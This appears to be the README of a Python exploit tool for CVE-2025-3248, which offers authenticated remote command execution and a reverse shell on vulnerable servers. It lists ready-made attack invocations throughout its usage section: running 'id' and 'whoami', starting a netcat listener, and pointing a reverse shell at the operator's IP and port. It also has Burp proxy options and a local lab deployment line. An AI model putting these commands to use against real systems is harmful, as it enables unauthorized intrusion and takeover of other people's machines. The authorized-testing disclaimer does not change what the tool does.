This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.
- Authenticated Command Execution: Run arbitrary system commands on the target.
- Reverse Shell: Spawn a reverse shell to your listener.
- Proxy Support: Route requests through a proxy (e.g., Burp Suite).
- Python 3.x
requestslibrary
Install dependencies with:
pip install requestspython3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]| Argument | Description | Required |
|---|---|---|
-u, --url |
Target base URL (e.g., https://target.com) |
Yes |
-l, --login |
Admin username | Yes |
-p, --password |
Admin password | Yes |
-c, --command |
Command to execute on the target | No* |
--proxy |
Proxy URL (e.g., http://127.0.0.1:8080) |
No |
--lhost |
Local host for reverse shell | No* |
--lport |
Local port for reverse shell | No* |
* You must specify either a command (-c) or both --lhost and --lport for a reverse shell.
python3 exploit.py -u https://target.com -l admin -p password -c "id"Start a listener on your machine:
nc -lvnp 4444Then run:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080You can deploy the Docker image using the following command:
podman compose up -dThe image will be available at http://localhost:7860.
Credits for the compose file: This repository
This script is for educational and authorized penetration testing purposes only. Do not use against systems you do not own or have explicit permission to test.
This readme is AI generated.